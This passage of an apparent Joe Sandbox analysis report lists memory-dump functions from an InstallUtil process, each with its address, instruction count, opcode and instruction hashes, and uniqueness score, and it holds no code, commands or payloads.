                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5ff5c73d06a2e696df4eb4106149305873e11edb53a53fc5cda241bbb7f41153
                                                                                                                                              • Instruction ID: c608ad6191057b239e9c0982089a5632edfbd3d77fcb6db0fed131c926e1de44
                                                                                                                                              • Opcode Fuzzy Hash: 5ff5c73d06a2e696df4eb4106149305873e11edb53a53fc5cda241bbb7f41153
                                                                                                                                              • Instruction Fuzzy Hash: AF11D69260FAD62FD35392BC18AA1B57FE0DF5B15074904E7D4C9CB1E3ED080806C392
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD403940 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 77e8543029f78817c06009a717edc41d788c822a17e7c0346a50be6c59b8c6fb
                                                                                                                                              • Instruction ID: 525a5326f29d71158e55917e7e63124f21e0c50a66babfa3210fa17031b6337e
                                                                                                                                              • Opcode Fuzzy Hash: 77e8543029f78817c06009a717edc41d788c822a17e7c0346a50be6c59b8c6fb
                                                                                                                                              • Instruction Fuzzy Hash: F8119A5A80E1E655EB12F738F8550F93F80DF02326B0405B7D6C99D093AD2D94DA85A6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400198 Relevance: .1, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 519e08e5bd9e8f2f2b4d8be50700f4ea9a5147927e573b5923f9e3a3b7baa47f
                                                                                                                                              • Instruction ID: d4bec0c042d3f4bff469b111afc609a839b498f98caf18c518cbe2a2a9b20451
                                                                                                                                              • Opcode Fuzzy Hash: 519e08e5bd9e8f2f2b4d8be50700f4ea9a5147927e573b5923f9e3a3b7baa47f
                                                                                                                                              • Instruction Fuzzy Hash: CF11273390D6A61BEB02F63CF4961E977D0DF46326B0804B7D589CE1A3ED2998878285
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40ACB5 Relevance: .1, Instructions: 67COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f7220ba7b66351bfba82c4a1e6d93029498f2c9c825e20f45ab9167b3dd4f93d
                                                                                                                                              • Instruction ID: 9e43d9898244041efdb505fe6d36a0ddaa231cd854161940097ac818a04b99e8
                                                                                                                                              • Opcode Fuzzy Hash: f7220ba7b66351bfba82c4a1e6d93029498f2c9c825e20f45ab9167b3dd4f93d
                                                                                                                                              • Instruction Fuzzy Hash: 5211047061DB890FD789DB2CC421B54BBD2EF99300F0942FAD089CB2A7DA28EC41C390
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD404992 Relevance: .1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 949368ffcea1d664b991af629c81c57ec8c80201dd044bec278dd4c4731dff50
                                                                                                                                              • Instruction ID: 36d527d5356029c4850eca678378c2a2234ac68b8bdd17d3ac6684bedcf6818b
                                                                                                                                              • Opcode Fuzzy Hash: 949368ffcea1d664b991af629c81c57ec8c80201dd044bec278dd4c4731dff50
                                                                                                                                              • Instruction Fuzzy Hash: 7D11E070A0D6488FD708DB28E446ABDB7E0EF89321F1001BED48FE7662DE256842CB45
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD408E5D Relevance: .0, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9879aefebca227dcd2134413f364512ff699663704ae51309b9b50e393fedb0d
                                                                                                                                              • Instruction ID: cb5449005077e365e6dc80794308afa7ff5731ee22ba9bbfb9d833d7dd0d7a06
                                                                                                                                              • Opcode Fuzzy Hash: 9879aefebca227dcd2134413f364512ff699663704ae51309b9b50e393fedb0d
                                                                                                                                              • Instruction Fuzzy Hash: 5AF028E244E6C62FD306A7B44D665EA7FA4DF4714034C05D5C8C58F9A3EA2C551A8391
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400499 Relevance: .0, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d62acd6c98e95e8b51ed69c16db76cb9f21df19610496c97b35e6bd718b9e9c1
                                                                                                                                              • Instruction ID: 53a56c3c7c94497f15018c2d7dd7e322d3bae713b2d5db9432296b3a5911b5f4
                                                                                                                                              • Opcode Fuzzy Hash: d62acd6c98e95e8b51ed69c16db76cb9f21df19610496c97b35e6bd718b9e9c1
                                                                                                                                              • Instruction Fuzzy Hash: 17F0378284FBC40FE397527498350A47FB0DF4B11078A01EBC4CACA1E3E84C594E8367
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD405C44 Relevance: .0, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4f90b3e5273ff6c680baedaae74f0ed3891a1f47b4fd8afb78dd7605de946566
                                                                                                                                              • Instruction ID: 85069adbfbd8c77162a31c9265fbdf77b451c0d06ae0ec21e9634d4332594565
                                                                                                                                              • Opcode Fuzzy Hash: 4f90b3e5273ff6c680baedaae74f0ed3891a1f47b4fd8afb78dd7605de946566
                                                                                                                                              • Instruction Fuzzy Hash: D90144B052EA976FD7A3877844951697FE0EF0F10579408F9C88ACB2C6ED5CA0429742
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400DB5 Relevance: .0, Instructions: 42COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0234a90ae2a52ad7e6d00d9ee313fed0b761321108af685dd6db8cdd008055b0
                                                                                                                                              • Instruction ID: e195204ea0d69d66ddd101376e93d5d63f04d229f4a1dbaca532f2200cd2d174
                                                                                                                                              • Opcode Fuzzy Hash: 0234a90ae2a52ad7e6d00d9ee313fed0b761321108af685dd6db8cdd008055b0
                                                                                                                                              • Instruction Fuzzy Hash: C1F0CD96C4E5EA26FE637678A4110FC6E44DF18321F140572FA4F940936D2C789581F5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407F10 Relevance: .0, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 517d0b2303c9d3c02ebd4ebdc341a7dd8c4d489c2286f62aa98e93f74ea2ff53
                                                                                                                                              • Instruction ID: 06c9068211a8f2047ff1d9b6dd9a4a064a50add62576d5dd82fb29958f3eabd9
                                                                                                                                              • Opcode Fuzzy Hash: 517d0b2303c9d3c02ebd4ebdc341a7dd8c4d489c2286f62aa98e93f74ea2ff53
                                                                                                                                              • Instruction Fuzzy Hash: 3D01F971A1D95A6FD35ADB7484606E97BD1EF0A310B5405FDC84AC76D3DE1C9801C781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400501 Relevance: .0, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8fdba7053fc8b22e802585ae6091f90f21c845374411ee2edd18067fa075b67f
                                                                                                                                              • Instruction ID: d3efe727e3e59af34cab16399ea90452baade575e1aa05ee77b1e3ff78fa4e2d
                                                                                                                                              • Opcode Fuzzy Hash: 8fdba7053fc8b22e802585ae6091f90f21c845374411ee2edd18067fa075b67f
                                                                                                                                              • Instruction Fuzzy Hash: 85F0399180F7C62FE36382744D294AA3F74DF4B10471E05FBE8898B0E3E90C6808D362
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4080BA Relevance: .0, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4e96597057170961a9ce23e2b0999055be7b9445a27f8002d92c5f992a87ecc
                                                                                                                                              • Instruction ID: 8143543185cb94b6176a76b95503d71ace7981f0b453894ef443b9c201ff2728
                                                                                                                                              • Opcode Fuzzy Hash: b4e96597057170961a9ce23e2b0999055be7b9445a27f8002d92c5f992a87ecc
                                                                                                                                              • Instruction Fuzzy Hash: 430167B0D1D42DAAF711EA74D9509FD7272FF88301F548635E90AAA2D7ED2C34029760
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD408D8D Relevance: .0, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b59c190e163a4ab0b55c83eecc4766c1e370d00866697f27a804658da3ea9d27
                                                                                                                                              • Instruction ID: 267a02db536edbb9d904551fe7b98f7771808e4be6cd98ed207820cf54e45886
                                                                                                                                              • Opcode Fuzzy Hash: b59c190e163a4ab0b55c83eecc4766c1e370d00866697f27a804658da3ea9d27
                                                                                                                                              • Instruction Fuzzy Hash: 03F0A75291EAC62FE353A27859A90E93FA0DE9B11035C06E7D485CF493EA0C444A83D6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407411 Relevance: .0, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 22e1d9c3a60a597aea1abf397fa24ef1207ee5a34e518a3fc6cbfe6fe81188fc
                                                                                                                                              • Instruction ID: f4880f0af2b6026d201cf6df47b3e1bceac402067ecbd75f395c5a5df35d1ae0
                                                                                                                                              • Opcode Fuzzy Hash: 22e1d9c3a60a597aea1abf397fa24ef1207ee5a34e518a3fc6cbfe6fe81188fc
                                                                                                                                              • Instruction Fuzzy Hash: 7DF0E990D0D5A40FE3A5D22884A53357ED1EF89202F4405EBD598CB6E7ED1DDCC98341
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4006F8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 71b351e93c9e51515a297723fbbaeb953b6f666cdfa01464bece52b01c0d9cb6
                                                                                                                                              • Instruction ID: 24e435e0cabab20019ea1428f4c8391a2b8ca2484546fede53f627a8a88538ea
                                                                                                                                              • Opcode Fuzzy Hash: 71b351e93c9e51515a297723fbbaeb953b6f666cdfa01464bece52b01c0d9cb6
                                                                                                                                              • Instruction Fuzzy Hash: 69F0C89191DD8B7EEB96D378442A170AED1EF49150B0805B9C44DC72C3ED0C18018752
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD406065 Relevance: .0, Instructions: 37COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 393b6ab9b405a20a12fb960637c55da613a6c8270a9b09364d926531a76d3dee
                                                                                                                                              • Instruction ID: 060c91627848e4e9a62784f2ae4d94edc1261e95f920c947de19b3f29c4e2592
                                                                                                                                              • Opcode Fuzzy Hash: 393b6ab9b405a20a12fb960637c55da613a6c8270a9b09364d926531a76d3dee
                                                                                                                                              • Instruction Fuzzy Hash: C9F0C871A1D5495BEB55D738C4552E937D2DB88310F194AB6C84ACB2D1ED7C584283C4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4029C4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e02152cadb5f4dd0153365f3507dbd16e20f2fe2eeead20c9ca9190ce04be656
                                                                                                                                              • Instruction ID: e3b046e32bde3e3e2ec91c98b915c5f654a6d33b524c4cf94a50a441e1e1e3f7
                                                                                                                                              • Opcode Fuzzy Hash: e02152cadb5f4dd0153365f3507dbd16e20f2fe2eeead20c9ca9190ce04be656
                                                                                                                                              • Instruction Fuzzy Hash: ED01A2A0D1D69A5FDB66DBB888A14ADBFB0FF05210B540AADD09AD71C3DE281402DB01
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4001F0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7cb38a6aec6128a5de2108f4d7eb298329ab05ab612dad1cb38710187d54ce32
                                                                                                                                              • Instruction ID: 1a2bcd7255c2ea34f15fe8e76841b5c0b7db719d82dba5fba29297db8a2a7145
                                                                                                                                              • Opcode Fuzzy Hash: 7cb38a6aec6128a5de2108f4d7eb298329ab05ab612dad1cb38710187d54ce32
                                                                                                                                              • Instruction Fuzzy Hash: E5F0273091E5152FD755B638A0461F97BD0CF49210F140CBADC0DC72E6EC6D988243C5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4149A0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da09f48e4ee08f1f2f7863cd744c249e5d3b707f622765799de08dfcf1cf5bf1
                                                                                                                                              • Instruction ID: 58f13cb96d0cd265f64b9c416139260b6e0939f3bd1a89bb3ca791b51c37c085
                                                                                                                                              • Opcode Fuzzy Hash: da09f48e4ee08f1f2f7863cd744c249e5d3b707f622765799de08dfcf1cf5bf1
                                                                                                                                              • Instruction Fuzzy Hash: 59F0273055E84A6FE646E7784CA62FA7BE0FF0C200B8400AAC48DC72A3EE0C9047C302
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4050D4 Relevance: .0, Instructions: 31COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9b6486bf73584101fdf3022b37b2f08e63d2766974ccacab0a96d29fbd61dd71
                                                                                                                                              • Instruction ID: 72df8ab7d175723e6085f70a1c9f64cda63649a8d0d3a879d20780bb9e296a8f
                                                                                                                                              • Opcode Fuzzy Hash: 9b6486bf73584101fdf3022b37b2f08e63d2766974ccacab0a96d29fbd61dd71
                                                                                                                                              • Instruction Fuzzy Hash: C8F05C7080E7421FD352EB3884420E57FE0DF4A210B140CFECC89DB2A2E92C94478381
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD409EDB Relevance: .0, Instructions: 30COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 60979a5671e2cb9c090a74d8c064122d8f2b1349c0d675a7daa7a9b309492fa0
                                                                                                                                              • Instruction ID: 02fb5f592b45b0cd8b51981cf40f8bd9be44ad70862f0c967233cef54c73c2dd
                                                                                                                                              • Opcode Fuzzy Hash: 60979a5671e2cb9c090a74d8c064122d8f2b1349c0d675a7daa7a9b309492fa0
                                                                                                                                              • Instruction Fuzzy Hash: D6F0A79250AA813AD746D17848155B97B81DF8925035C05ADD486871F2DC191D02C381
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40075B Relevance: .0, Instructions: 30COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f42219027164d3e50a11fe7489e55e5b5feec518cf3576f5da613cda9dc58dd7
                                                                                                                                              • Instruction ID: ed86cdf9ccbf1891e910c948d088cee01ac10cdf5d124a2161b8340931870d13
                                                                                                                                              • Opcode Fuzzy Hash: f42219027164d3e50a11fe7489e55e5b5feec518cf3576f5da613cda9dc58dd7
                                                                                                                                              • Instruction Fuzzy Hash: 38E0120073562A17F645737C58572B961C3EFDC702F800475A90FD62DBDC0E6C4202E2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD406777 Relevance: .0, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7a971ef47ddd0e7408e9d68d52240c248bc17a1f7095912bba32f5a5cbd35f1f
                                                                                                                                              • Instruction ID: 8d795d0d782203dd0e95e489d8d7aa869079316f937866ce0cdd4bf3dd0d463d
                                                                                                                                              • Opcode Fuzzy Hash: 7a971ef47ddd0e7408e9d68d52240c248bc17a1f7095912bba32f5a5cbd35f1f
                                                                                                                                              • Instruction Fuzzy Hash: 03E02BB160DA411FE6158638D4151247AD2EF8863070403BED81EC72D6EE2D5C018181
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD402A75 Relevance: .0, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1f0cf34b14df6730445c337248e61e898796acc315d23ae25d141bf4b4fb901b
                                                                                                                                              • Instruction ID: bac0d677e3b98a95e2e361751936119f7b0c44f4c2f5176768e07ae496543b46
                                                                                                                                              • Opcode Fuzzy Hash: 1f0cf34b14df6730445c337248e61e898796acc315d23ae25d141bf4b4fb901b
                                                                                                                                              • Instruction Fuzzy Hash: D0E0E5A094E18AAFD796D7ECD8D51FC3F61EF48240B500869C84797682ED1C2402C780
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4062D0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dbfa95bf2c7e4b9038cee3e88d1355aceadd26492dd50f12ea83522e5d3b49db
                                                                                                                                              • Instruction ID: 43e82a19df2ca8388ce8fd999a8b44a97b0d98143b294885f45c57fe35890feb
                                                                                                                                              • Opcode Fuzzy Hash: dbfa95bf2c7e4b9038cee3e88d1355aceadd26492dd50f12ea83522e5d3b49db
                                                                                                                                              • Instruction Fuzzy Hash: FFE02B7062E5AF6FD287D37848561BD7BD1EF4A200B5404FEC08ACB6A3DD189402C341
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40592A Relevance: .0, Instructions: 25COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5c15fb32aac426a463b7338eac0a83699b2b84db03fa92bfc24e839d8bcbdd3
